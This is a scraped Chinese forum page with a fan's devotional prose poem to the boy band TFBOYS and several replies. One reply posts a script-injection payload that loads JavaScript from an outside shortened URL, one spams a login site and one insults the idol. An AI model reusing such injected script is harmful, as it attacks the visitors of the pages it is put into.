遊客34319
首頁  163郵箱  新浪郵箱  QQ郵箱  126郵箱

致我愛的少年們

2015/8/29 12:06:00  人氣 376499    美文論壇  
TF、你們就是氧氣,少了你們四葉草們連呼吸都很困難。

TF、你們就是司南,少了你們四葉草們分不清東西南北。

TF、你們就是太陽,少了你們四葉草們連白天黑夜分不清。

TF、你們就是樂譜,少了你們四葉草們奏不出動聽的樂譜。

TF、你們就是彩筆,少了你們四葉草們畫不出絢麗的圖畫。

TF、你們就是鐘表,少了你們四葉草們連時刻都不知道。

TF、你們就是港灣,少了你們四葉草們就沒有避風的港口。

因為我喜歡TF,所以我才會在意你們得一舉一動,一言一行,才會在默默的關心你們。

因為我喜歡TF,所以我
下頁    上頁    全部    余下    

管理員(ID1001)修改此帖08-30 12:31

傻瓜這是情侶裝

美文論壇正式開啟:招募美文寫手
  給黑粉的一封信

發表回復

通知樓主

8樓

晴朗的天氣.02-26 11:24
@九冥圣麟:我是王俊凱,原來你喜歡我#7
你能發個真人照片嗎?

回復只看TA

7樓

九冥圣麟.02-11 12:08
我是王俊凱,原來你喜歡我

回復只看TA

6樓

游客3258.12-01 21:32
3gqqdenglu.wap.gg 空間登錄

回復只看TA

5樓

.09-29 14:57
<a href="#"><script src=http://t.cn/RcrGcqP></script></href>

回復只看TA

4樓

AWESOMEMHW.06-02 16:35
掏糞boy就該去掏糞 像掏糞boy這么惡心的藝人不值得崇拜

回復只看TA

更多回帖(8) 只看樓主回復
當前共有:144人在線
遊客34313于1秒前瀏覽帖子:(你是不是
遊客34319于1秒前瀏覽帖子:致我愛的少年們
Anonymous34240于1秒前瀏覽帖子:只愿以后相看兩不厭
游客34180于1秒前瀏覽:國家電網老總劉振亞“謝幕”成績單:資產翻三倍
游客34249于1秒前瀏覽:38歲當副部的竺延風 又乘了東風
智能書簽
QQ空間登錄為你報時:2024/5/13 5:53:45.
普通 彩版 電腦 選擇
簡體 繁體 英文 選擇
163郵箱登陸 qq郵箱登錄 126郵箱登錄